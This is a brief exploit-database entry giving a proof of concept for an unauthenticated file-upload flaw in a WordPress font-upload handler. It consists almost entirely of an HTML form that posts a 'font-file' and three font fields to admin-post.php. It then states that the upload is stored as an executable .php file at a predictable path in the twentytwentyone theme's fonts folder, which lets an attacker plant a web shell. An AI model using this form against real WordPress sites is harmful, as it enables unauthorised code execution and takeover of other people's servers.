Share
## https://sploitus.com/exploit?id=WPEX-ID:3BCABE5D-3FD8-42BD-8A80-2527A6D07A7C
As unauthenticated user, open
<form action="https://example.com/wp-admin/admin-post.php" method="POST" enctype="multipart/form-data">
<input type="file" name="font-file" />
<input type="text" name="font-name" value="1"/>
<input type="text" name="font-weight" value="1"/>
<input type="text" name="font-style" value="1"/>
<input type="submit" value="Upload" />
The file will be uploaded at https://example.com/wp-content/themes/twentytwentyone/assets/fonts/1_1_1.php (assuming the twentytwentyone theme is installed)